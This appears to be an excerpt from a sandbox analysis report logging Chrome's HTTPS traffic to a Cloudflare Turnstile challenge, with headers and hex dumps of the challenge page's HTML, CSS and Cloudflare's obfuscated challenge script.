                                                                                                                                                                                                                                  accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                                                                                                                  critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                                                                                                                  referrer-policy: same-origin
                                                                                                                                                                                                                                  document-policy: js-profiling
                                                                                                                                                                                                                                  2024-12-18 19:27:48 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 66 34 31 38 64 36 38 39 61 64 64 33 32 63 61 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                                                                                                                                                                  Data Ascii: Server: cloudflareCF-RAY: 8f418d689add32ca-EWRalt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  2024-12-18 19:27:48 UTC1294INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                                                                                                                                                                                                  Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                                                                                                                                                                                                  2024-12-18 19:27:48 UTC1369INData Raw: 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65
                                                                                                                                                                                                                                  Data Ascii: dding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:antialiase
                                                                                                                                                                                                                                  2024-12-18 19:27:48 UTC1369INData Raw: 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 66 69 6c 6c 3a 23
                                                                                                                                                                                                                                  Data Ascii: stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;fill:#
                                                                                                                                                                                                                                  2024-12-18 19:27:48 UTC1369INData Raw: 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72
                                                                                                                                                                                                                                  Data Ascii: e-dark #challenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dar
                                                                                                                                                                                                                                  2024-12-18 19:27:48 UTC1369INData Raw: 32 30 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68
                                                                                                                                                                                                                                  Data Ascii: 20}.theme-dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-h
                                                                                                                                                                                                                                  2024-12-18 19:27:48 UTC1369INData Raw: 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 3b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 72 6f 6b 65 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 7b 66 69 6c 6c 3a 23 66 66 66 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 62 6f 74 74 6f 6d 20 63 65 6e 74 65 72 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 69 6e 2e 61 6e 69 6d 61 74 69 6f 6e 7b 30 25 7b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 73 74 72 6f 6b 65 3a 23 64 65 31
                                                                                                                                                                                                                                  Data Ascii: ;stroke-dashoffset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de1303;fill:#de1303;animation:stroke .6s cubic-bezier(.65,0,.45,1) forwards}.failure-cross{fill:#fff;transform-origin:bottom center}@keyframes fade-in.animation{0%{fill:#de1303;stroke:#de1
                                                                                                                                                                                                                                  2024-12-18 19:27:48 UTC1369INData Raw: 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d
                                                                                                                                                                                                                                  Data Ascii: ay:flex;flex-flow:column nowrap;gap:0;height:140px;padding:12px 0;place-content:space-between}.size-compact .link-spacer{margin-left:3px;margin-right:3px}.size-compact .cb-c{margin:0 12px;text-align:left}.size-compact .cb-container{margin:0 12px}.size-com
                                                                                                                                                                                                                                  2024-12-18 19:27:48 UTC1369INData Raw: 69 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 2c 2e 72 74 6c 20 23 66 72 2d 6f 76 65 72 72 75 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65
                                                                                                                                                                                                                                  Data Ascii: i{left:255px}.rtl #fr-helper,.rtl #fr-overrun{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-left:0;padding-right:0;text-align:left}.rtl.size-compact #branding{align-self:fle
                                                                                                                                                                                                                                  2024-12-18 19:27:48 UTC1369INData Raw: 6f 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 2e 69 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 6e 73 70 75 6e 20 2e 63 69 72 63 6c 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 75 6e 73 70 69 6e 20 2e 37 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                                                                                                                                                                                                                  Data Ascii: olor:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#challenge-error-title .i-wrapper{display:none}.unspun .circle{animation:unspin .7s cubic-bezier(.65,0,.45,1) forwards}.circle{stroke-width


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  7192.168.2.1649715104.18.95.414436196C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-12-18 19:27:50 UTC727OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f418d689add32ca&lang=auto HTTP/1.1
                                                                                                                                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/4r65z/0x4AAAAAAA3CjQARFbjEVtU4/auto/fbE/normal/auto/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-12-18 19:27:50 UTC331INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Date: Wed, 18 Dec 2024 19:27:50 GMT
                                                                                                                                                                                                                                  Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                                  Content-Length: 116196
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                  CF-RAY: 8f418d737ea44369-EWR
                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  2024-12-18 19:27:50 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 53 79 57 4f 55 33 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74
                                                                                                                                                                                                                                  Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.SyWOU3={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.privacy_link":"htt
                                                                                                                                                                                                                                  2024-12-18 19:27:50 UTC1369INData Raw: 30 63 6c 6f 63 6b 25 32 30 69 73 25 32 30 73 65 74 25 32 30 74 6f 25 32 30 61 25 32 30 77 72 6f 6e 67 25 32 30 74 69 6d 65 25 32 30 6f 72 25 32 30 74 68 69 73 25 32 30 63 68 61 6c 6c 65 6e 67 65 25 32 30 70 61 67 65 25 32 30 77 61 73 25 32 30 61 63 63 69 64 65 6e 74 61 6c 6c 79 25 32 30 63 61 63 68 65 64 25 32 30 62 79 25 32 30 61 6e 25 32 30 69 6e 74 65 72 6d 65 64 69 61 72 79 25 32 30 61 6e 64 25 32 30 69 73 25 32 30 6e 6f 25 32 30 6c 6f 6e 67 65 72 25 32 30 61 76 61 69 6c 61 62 6c 65 22 2c 22 69 6e 76 61 6c 69 64 5f 73 69 74 65 6b 65 79 22 3a 22 49 6e 76 61 6c 69 64 25 32 30 73 69 74 65 6b 65 79 2e 25 32 30 43 6f 6e 74 61 63 74 25 32 30 74 68 65 25 32 30 53 69 74 65 25 32 30 41 64 6d 69 6e 69 73 74 72 61 74 6f 72 25 32 30 69 66 25 32 30 74 68 69 73 25
                                                                                                                                                                                                                                  Data Ascii: 0clock%20is%20set%20to%20a%20wrong%20time%20or%20this%20challenge%20page%20was%20accidentally%20cached%20by%20an%20intermediary%20and%20is%20no%20longer%20available","invalid_sitekey":"Invalid%20sitekey.%20Contact%20the%20Site%20Administrator%20if%20this%
                                                                                                                                                                                                                                  2024-12-18 19:27:50 UTC1369INData Raw: 2c 66 55 2c 67 31 2c 67 61 2c 67 62 2c 67 42 2c 67 43 2c 67 47 2c 67 48 2c 67 38 2c 67 39 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 33 37 35 29 29 2f 31 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 37 37 31 29 29 2f 32 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 32 32 37 29 29 2f 33 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 33 31 39 29 29 2f 34 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 37 32 38 29 29 2f 35 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 31 34 38 33 29 29 2f 36 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 39 36 30 29 29 2f 37 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49
                                                                                                                                                                                                                                  Data Ascii: ,fU,g1,ga,gb,gB,gC,gG,gH,g8,g9){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=-parseInt(gI(1375))/1+parseInt(gI(1771))/2+-parseInt(gI(1227))/3+parseInt(gI(1319))/4+parseInt(gI(1728))/5*(parseInt(gI(1483))/6)+parseInt(gI(960))/7*(-parseInt(gI
                                                                                                                                                                                                                                  2024-12-18 19:27:50 UTC1369INData Raw: 72 6e 20 68 3d 3d 69 7d 2c 27 76 73 6f 55 6c 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 54 4a 43 51 66 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 27 46 77 63 5a 6e 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 43 64 65 59 4b 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 49 67 49 62 64 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 70 78 66 63 47 27 3a 67 4b 28 39 30 31 29 2c 27 69 6b 4d 52 74 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 75 48 62 49 6b 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b
                                                                                                                                                                                                                                  Data Ascii: rn h==i},'vsoUl':function(h,i){return h<i},'TJCQf':function(h,i){return h<<i},'FwcZn':function(h,i){return h-i},'CdeYK':function(h,i){return h(i)},'IgIbd':function(h,i){return i==h},'pxfcG':gK(901),'ikMRt':function(h,i){return h(i)},'uHbIk':function(h,i){
                                                                                                                                                                                                                                  2024-12-18 19:27:50 UTC1369INData Raw: 48 5b 67 4e 28 31 35 39 30 29 5d 28 64 5b 67 4e 28 38 39 39 29 5d 28 6f 2c 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 78 2b 2b 29 3b 66 6f 72 28 4e 3d 44 5b 67 4e 28 31 36 33 36 29 5d 28 30 29 2c 78 3d 30 3b 64 5b 67 4e 28 31 34 30 39 29 5d 28 38 2c 78 29 3b 49 3d 64 5b 67 4e 28 38 33 37 29 5d 28 49 2c 31 29 7c 31 26 4e 2c 64 5b 67 4e 28 31 38 32 30 29 5d 28 4a 2c 64 5b 67 4e 28 31 36 39 37 29 5d 28 6a 2c 31 29 29 3f 28 4a 3d 30 2c 48 5b 67 4e 28 31 35 39 30 29 5d 28 64 5b 67 4e 28 31 35 38 33 29 5d 28 6f 2c 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 4e 3e 3e 3d 31 2c 78 2b 2b 29 3b 7d 65 6c 73 65 20 69 66 28 67 4e 28 31 30 36 38 29 3d 3d 3d 67 4e 28 31 30 36 38 29 29 7b 66 6f 72 28 4e 3d 31 2c 78 3d 30 3b 78 3c 47 3b 49 3d 49 3c 3c 31 7c 4e 2c 64 5b 67 4e 28 31
                                                                                                                                                                                                                                  Data Ascii: H[gN(1590)](d[gN(899)](o,I)),I=0):J++,x++);for(N=D[gN(1636)](0),x=0;d[gN(1409)](8,x);I=d[gN(837)](I,1)|1&N,d[gN(1820)](J,d[gN(1697)](j,1))?(J=0,H[gN(1590)](d[gN(1583)](o,I)),I=0):J++,N>>=1,x++);}else if(gN(1068)===gN(1068)){for(N=1,x=0;x<G;I=I<<1|N,d[gN(1
                                                                                                                                                                                                                                  2024-12-18 19:27:50 UTC1369INData Raw: 5d 28 30 29 2c 78 3d 30 3b 31 36 3e 78 3b 49 3d 64 5b 67 4e 28 37 37 30 29 5d 28 49 3c 3c 31 2e 30 34 2c 64 5b 67 4e 28 31 38 32 38 29 5d 28 4e 2c 31 29 29 2c 6a 2d 31 3d 3d 4a 3f 28 4a 3d 30 2c 48 5b 67 4e 28 31 35 39 30 29 5d 28 64 5b 67 4e 28 34 35 39 29 5d 28 6f 2c 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 4e 3e 3e 3d 31 2c 78 2b 2b 29 3b 7d 45 2d 2d 2c 45 3d 3d 30 26 26 28 45 3d 4d 61 74 68 5b 67 4e 28 36 37 35 29 5d 28 32 2c 47 29 2c 47 2b 2b 29 2c 64 65 6c 65 74 65 20 43 5b 44 5d 7d 65 6c 73 65 20 66 6f 72 28 4e 3d 42 5b 44 5d 2c 78 3d 30 3b 64 5b 67 4e 28 34 39 30 29 5d 28 78 2c 47 29 3b 49 3d 49 3c 3c 31 7c 31 26 4e 2c 4a 3d 3d 6a 2d 31 3f 28 4a 3d 30 2c 48 5b 67 4e 28 31 35 39 30 29 5d 28 6f 28 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 4e 3e 3e 3d 31
                                                                                                                                                                                                                                  Data Ascii: ](0),x=0;16>x;I=d[gN(770)](I<<1.04,d[gN(1828)](N,1)),j-1==J?(J=0,H[gN(1590)](d[gN(459)](o,I)),I=0):J++,N>>=1,x++);}E--,E==0&&(E=Math[gN(675)](2,G),G++),delete C[D]}else for(N=B[D],x=0;d[gN(490)](x,G);I=I<<1|1&N,J==j-1?(J=0,H[gN(1590)](o(I)),I=0):J++,N>>=1
                                                                                                                                                                                                                                  2024-12-18 19:27:50 UTC1369INData Raw: 32 2c 43 29 2c 46 3d 31 3b 4b 21 3d 46 3b 4c 3d 64 5b 67 51 28 31 38 32 38 29 5d 28 47 2c 48 29 2c 48 3e 3e 3d 31 2c 48 3d 3d 30 26 26 28 48 3d 6a 2c 47 3d 6f 28 49 2b 2b 29 29 2c 4a 7c 3d 28 30 3c 4c 3f 31 3a 30 29 2a 46 2c 46 3c 3c 3d 31 29 3b 73 77 69 74 63 68 28 4d 3d 4a 29 7b 63 61 73 65 20 30 3a 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 67 51 28 36 37 35 29 5d 28 32 2c 38 29 2c 46 3d 31 3b 4b 21 3d 46 3b 4c 3d 64 5b 67 51 28 31 38 32 38 29 5d 28 47 2c 48 29 2c 48 3e 3e 3d 31 2c 48 3d 3d 30 26 26 28 48 3d 6a 2c 47 3d 64 5b 67 51 28 35 39 37 29 5d 28 6f 2c 49 2b 2b 29 29 2c 4a 7c 3d 28 30 3c 4c 3f 31 3a 30 29 2a 46 2c 46 3c 3c 3d 31 29 3b 73 5b 42 2b 2b 5d 3d 64 5b 67 51 28 38 39 39 29 5d 28 65 2c 4a 29 2c 4d 3d 42 2d 31 2c 78 2d 2d 3b 62 72 65 61
                                                                                                                                                                                                                                  Data Ascii: 2,C),F=1;K!=F;L=d[gQ(1828)](G,H),H>>=1,H==0&&(H=j,G=o(I++)),J|=(0<L?1:0)*F,F<<=1);switch(M=J){case 0:for(J=0,K=Math[gQ(675)](2,8),F=1;K!=F;L=d[gQ(1828)](G,H),H>>=1,H==0&&(H=j,G=d[gQ(597)](o,I++)),J|=(0<L?1:0)*F,F<<=1);s[B++]=d[gQ(899)](e,J),M=B-1,x--;brea
